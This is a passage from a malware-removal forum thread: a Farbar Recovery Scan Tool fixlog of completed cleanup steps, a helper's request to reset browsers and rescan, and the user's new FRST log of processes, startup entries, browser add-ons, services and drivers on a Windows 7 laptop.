C:\ProgramData\Temp => ":8A620099" ADS removed successfully.
C:\ProgramData\Temp => ":9AB56A06" ADS removed successfully.
C:\ProgramData\Temp => ":E73B14E2" ADS removed successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\30553336.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\55732387.sys" => key removed successfully
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30" => key removed successfully
HKCU\\software\\zorrezmj => could not remove key.: incorrect path.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30 => could not remove key. ErrorCode: 0xC0000033

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {ED0346BF-A3A2-4A28-8A8A-79F817262CA3}.
{1E80B1D0-B98A-4FA7-B087-23A0C07A91F7} canceled.
{59C5CDDB-BCBA-47F9-9081-20247362EEC7} canceled.
{5525C2C5-5533-4DB3-B9E1-F05E8599FA42} canceled.
{E30D3862-D9C6-47AE-BA2C-B9DF9524F31D} canceled.
{B3CB8EEA-7218-4391-A578-783D38BE2E0A} canceled.
{09D9AA74-C446-4314-882E-C0412A77A73F} canceled.
{44A3B125-C850-47CF-9198-5395479889E4} canceled.
{A5A2E9CB-4986-4147-89BB-05EAF73B8D18} canceled.
{BB086309-A472-4933-91F1-3594C942C388} canceled.
{3C5C9742-865B-46AE-A66B-B6EE2E60B04A} canceled.
{1AB6C52C-DE46-4264-9864-C8C88327E845} canceled.
{6489D4AC-2A8D-448B-B873-83201339612E} canceled.
{991B226B-16D7-41F4-B224-A795E6F3D569} canceled.
{EC2CA711-1BC7-45E7-8E46-E110F69BE5EE} canceled.
{183DBE47-5953-4134-BD9C-DE5718D6D06F} canceled.
{8583975A-1940-4229-944C-9DFEA9AD605A} canceled.
{6C1B4F50-9205-4E82-AB89-7BCD1E92B4E1} canceled.
17 out of 18 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset catalog =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 58908930 B
Java, Flash, Steam htmlcache => 132509 B
Windows/system/drivers => 1453185661 B
Edge => 0 B
Chrome => 46220099 B
Firefox => 381194998 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 78315242 B
systemprofile32 => 115508 B
LocalService => 132244 B
NetworkService => 67452 B
Owner => 1474150383 B

RecycleBin => 288752171 B
EmptyTemp: => 3.5 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:16:48 ====



#4
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Please reset your web browsers.
To do that:
http://www.howtogeek...fault-settings/


Re-run the Farbar Recovery Scan Tool (FRST/FRST64) that you ran at the very beginning of this topic.
  • Double-click to run it. When the tool opens, click Yes to the disclaimer.
  • Make sure you checkmark the Addition.txt box.
  • Press the Scan button.
  • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.


#5
dreamtime

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Done.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016
Ran by Owner (administrator) on OWNER-HP (01-12-2016 14:41:06)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
() C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Online Games Manager\ogmservice.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2013-07-05] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6489704 2013-07-16] (Realtek Semiconductor)
HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [246264 2015-07-16] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1258496 2015-07-16] (Trend Micro Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-06-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [586296 2010-11-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [146736 2013-11-13] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Kaspersky Software Updater Beta.lnk [2016-11-26]
ShortcutTarget: Kaspersky Software Updater Beta.lnk -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-12-25]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler.exe [2012-11-11] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C05AD519-926E-46DA-A286-D6B3A0E85834}: [DhcpNameServer] 168.94.0.15 168.94.0.14
Tcpip\..\Interfaces\{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
BHO: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-08-23] (HP Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems Incorporated)
BHO-x32: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
BHO-x32: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-08-23] (HP Inc.)
Toolbar: HKLM - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
Handler-x32: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
Handler: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler-x32: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\ve78rhlb.default-1480619905508 [2016-12-01]
FF NetworkProxy: Mozilla\Firefox\Profiles\ve78rhlb.default-1480619905508 -> no_proxies_on", "https://localhost, localhost, 127.0.0.1"
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF Extension: (Trend Micro BEP Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension [2016-10-21]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF HKLM-x32\...\Firefox\Extensions: [{22181a4d-af90-4ca3-a569-faed9118d6bc}] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension
FF Extension: (Trend Micro Toolbar) - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension [2016-11-13]
FF HKLM-x32\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: (Trend Micro Osprey Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2016-10-22]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\6\NP_wtapp.dll [2012-10-23] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2016-12-01]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-26]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-26]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-26]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-26]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-26]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-26]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-26]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 ogmservice; C:\Program Files (x86)\Online Games Manager\ogmservice.exe [582544 2016-07-13] (RealNetworks, Inc.)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [1137664 2015-07-16] (Trend Micro Inc.)
R2 PwmSvc; C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe [2458624 2016-09-01] (Trend Micro Inc.)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 31DADE60; C:\Windows\System32\drivers\31DADE60.sys [478392 2016-11-26] (Kaspersky Lab ZAO)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [140504 2016-08-10] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [332512 2016-08-10] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC64.sys [59712 2015-06-11] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [116576 2015-06-08] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [106720 2016-08-10] (Trend Micro Inc.)
